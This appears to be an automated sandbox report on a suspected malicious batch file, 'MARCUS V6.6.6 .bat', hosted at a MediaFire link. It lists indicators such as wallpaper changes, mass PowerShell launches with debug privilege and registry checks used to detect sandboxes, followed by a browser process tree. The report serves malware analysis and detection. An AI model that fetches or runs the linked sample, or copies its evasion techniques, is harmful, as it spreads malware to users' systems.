Analysis
-
max time kernel
154s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
02/05/2025, 10:53
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file
Resource
win10v2004-20250314-en
Behavioral task
behavioral2
Sample
https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file
Resource
win10ltsc2021-20250410-en
Behavioral task
behavioral3
Sample
https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file
Resource
win11-20250410-en
General
-
Target
https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file
Malware Config
Signatures
-
Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs
description pid Process procid_target PID 3800 created 4436 3800 taskmgr.exe 83 PID 3800 created 4436 3800 taskmgr.exe 83 -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\Desktop\Wallpaper = "C:\\magnus\\matrix.bmp" reg.exe -
pid Process 5192 powershell.exe 5416 powershell.exe 1620 powershell.exe 5164 powershell.exe 8584 powershell.exe 10160 powershell.exe 8344 powershell.exe 9764 powershell.exe 10804 powershell.exe 5216 powershell.exe 9148 powershell.exe 6328 powershell.exe 8160 powershell.exe 8604 powershell.exe 7892 powershell.exe 6088 powershell.exe 7132 powershell.exe 7304 powershell.exe 8716 powershell.exe 9452 powershell.exe 9416 powershell.exe 10400 powershell.exe 6204 powershell.exe 6856 powershell.exe 8028 powershell.exe 7268 powershell.exe 8864 powershell.exe 9320 powershell.exe 10664 powershell.exe 6976 powershell.exe 9596 powershell.exe 9756 powershell.exe 10268 powershell.exe 10528 powershell.exe 11068 powershell.exe 7472 powershell.exe 5600 powershell.exe 6588 powershell.exe 6728 powershell.exe 10936 powershell.exe 11204 powershell.exe 5428 powershell.exe 5992 powershell.exe 7752 powershell.exe 7736 powershell.exe 8112 powershell.exe 8476 powershell.exe 8736 powershell.exe 8308 powershell.exe 4452 powershell.exe 6464 powershell.exe 9904 powershell.exe 9392 powershell.exe 6964 powershell.exe 9000 powershell.exe 10032 powershell.exe 5168 powershell.exe 10164 powershell.exe 6576 powershell.exe 7624 powershell.exe 6992 powershell.exe 7720 powershell.exe 8212 powershell.exe 7968 powershell.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4360 powershell.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe -
Checks processor information in registry 2 TTPs 5 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wermgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 wermgr.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU wermgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry msedge.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133906568095642924" msedge.exe -
Modifies registry class 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-83325578-304917428-1200496059-1000\{ABFFE479-7355-4D5A-8373-56353A111EB3} msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 4360 powershell.exe 4360 powershell.exe 4360 powershell.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 3968 powershell.exe 3968 powershell.exe 3968 powershell.exe 5344 taskmgr.exe 5600 powershell.exe 5600 powershell.exe 5600 powershell.exe 5168 powershell.exe 5168 powershell.exe 5168 powershell.exe 6088 powershell.exe 6088 powershell.exe 6088 powershell.exe 5216 powershell.exe 5216 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 23 IoCs
pid Process 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 472 chrome.exe 472 chrome.exe 472 chrome.exe 472 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5344 taskmgr.exe Token: SeSystemProfilePrivilege 5344 taskmgr.exe Token: SeCreateGlobalPrivilege 5344 taskmgr.exe Token: SeDebugPrivilege 4360 powershell.exe Token: SeDebugPrivilege 3968 powershell.exe Token: SeDebugPrivilege 5600 powershell.exe Token: SeDebugPrivilege 5168 powershell.exe Token: SeDebugPrivilege 6088 powershell.exe Token: SeDebugPrivilege 5216 powershell.exe Token: SeDebugPrivilege 5192 powershell.exe Token: SeDebugPrivilege 4452 powershell.exe Token: SeDebugPrivilege 5164 powershell.exe Token: SeDebugPrivilege 5416 powershell.exe Token: SeDebugPrivilege 1620 powershell.exe Token: SeDebugPrivilege 5428 powershell.exe Token: SeDebugPrivilege 5992 powershell.exe Token: SeDebugPrivilege 6204 powershell.exe Token: SeDebugPrivilege 6328 powershell.exe Token: SeDebugPrivilege 6464 powershell.exe Token: SeDebugPrivilege 6588 powershell.exe Token: SeDebugPrivilege 6728 powershell.exe Token: SeDebugPrivilege 6856 powershell.exe Token: SeDebugPrivilege 6992 powershell.exe Token: SeDebugPrivilege 7132 powershell.exe Token: SeDebugPrivilege 6576 powershell.exe Token: SeDebugPrivilege 6976 powershell.exe Token: SeDebugPrivilege 6964 powershell.exe Token: SeDebugPrivilege 7304 powershell.exe Token: SeDebugPrivilege 7472 powershell.exe Token: SeDebugPrivilege 7624 powershell.exe Token: SeDebugPrivilege 7752 powershell.exe Token: SeDebugPrivilege 7892 powershell.exe Token: SeDebugPrivilege 8028 powershell.exe Token: SeDebugPrivilege 8160 powershell.exe Token: SeDebugPrivilege 7268 powershell.exe Token: SeDebugPrivilege 7736 powershell.exe Token: SeDebugPrivilege 8112 powershell.exe Token: SeDebugPrivilege 7720 powershell.exe Token: SeDebugPrivilege 8212 powershell.exe Token: SeDebugPrivilege 8344 powershell.exe Token: SeDebugPrivilege 8476 powershell.exe Token: SeDebugPrivilege 8604 powershell.exe Token: SeDebugPrivilege 8736 powershell.exe Token: SeDebugPrivilege 8864 powershell.exe Token: SeDebugPrivilege 9000 powershell.exe Token: SeDebugPrivilege 9148 powershell.exe Token: SeDebugPrivilege 8308 powershell.exe Token: SeDebugPrivilege 7968 powershell.exe Token: SeDebugPrivilege 9020 powershell.exe Token: SeDebugPrivilege 8584 powershell.exe Token: SeDebugPrivilege 8716 powershell.exe Token: SeDebugPrivilege 9320 powershell.exe Token: SeDebugPrivilege 9452 powershell.exe Token: SeDebugPrivilege 9596 powershell.exe Token: SeDebugPrivilege 9764 powershell.exe Token: SeDebugPrivilege 9904 powershell.exe Token: SeDebugPrivilege 10032 powershell.exe Token: SeDebugPrivilege 10164 powershell.exe Token: SeDebugPrivilege 9416 powershell.exe Token: SeDebugPrivilege 9756 powershell.exe Token: SeDebugPrivilege 10160 powershell.exe Token: SeDebugPrivilege 9392 powershell.exe Token: SeDebugPrivilege 10268 powershell.exe Token: SeDebugPrivilege 10400 powershell.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
pid Process 4436 msedge.exe 4436 msedge.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 4436 msedge.exe 5344 taskmgr.exe 5344 taskmgr.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 4436 msedge.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe -
Suspicious use of SendNotifyMessage 64 IoCs
pid Process 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 4436 msedge.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe 5344 taskmgr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4436 wrote to memory of 4852 4436 msedge.exe 84 PID 4436 wrote to memory of 4852 4436 msedge.exe 84 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 468 4436 msedge.exe 86 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 468 4436 msedge.exe 86 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 1624 4436 msedge.exe 85 PID 4436 wrote to memory of 5024 4436 msedge.exe 87 PID 4436 wrote to memory of 5024 4436 msedge.exe 87 PID 4436 wrote to memory of 5024 4436 msedge.exe 87 PID 4436 wrote to memory of 5024 4436 msedge.exe 87 PID 4436 wrote to memory of 5024 4436 msedge.exe 87 PID 4436 wrote to memory of 5024 4436 msedge.exe 87 PID 4436 wrote to memory of 5024 4436 msedge.exe 87 PID 4436 wrote to memory of 5024 4436 msedge.exe 87 PID 4436 wrote to memory of 5024 4436 msedge.exe 87
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.mediafire.com/file/x2gpxs8tk4fud03/MARCUS+V6.6.6+.bat/file1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4436 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x2cc,0x2a0,0x2d0,0x2c8,0x2d8,0x7fff2494f208,0x7fff2494f214,0x7fff2494f2202⤵PID:4852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2240,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=2236 /prefetch:22⤵PID:1624
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1920,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=2348 /prefetch:32⤵PID:468
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2616,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=2696 /prefetch:82⤵PID:5024
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3452,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=3548 /prefetch:12⤵PID:184
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3480,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=3536 /prefetch:12⤵PID:2100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4248,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=4256 /prefetch:12⤵PID:5104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --extension-process --renderer-sub-type=extension --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4312,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=4292 /prefetch:22⤵PID:4340
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5128,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=5088 /prefetch:82⤵PID:4200
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5380,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=5388 /prefetch:82⤵PID:3224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --always-read-main-dll --field-trial-handle=6088,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6072 /prefetch:12⤵PID:3940
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5160,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=5928 /prefetch:82⤵PID:4296
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5936,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=5924 /prefetch:82⤵PID:4220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6256,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6272 /prefetch:82⤵PID:968
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6256,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6272 /prefetch:82⤵PID:3324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6484,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6508 /prefetch:82⤵PID:4164
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6516,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6544 /prefetch:82⤵PID:1668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6912,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6392 /prefetch:82⤵PID:4928
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6540,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6692 /prefetch:82⤵PID:2032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6536,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6680 /prefetch:82⤵PID:1264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6588,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6720 /prefetch:82⤵PID:1144
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7244,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=7252 /prefetch:82⤵PID:3568
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7240,i,17632331900058982734,4803068500446091068,262144 --variations-seed-version --mojo-platform-channel-handle=6668 /prefetch:82⤵PID:888
-
-
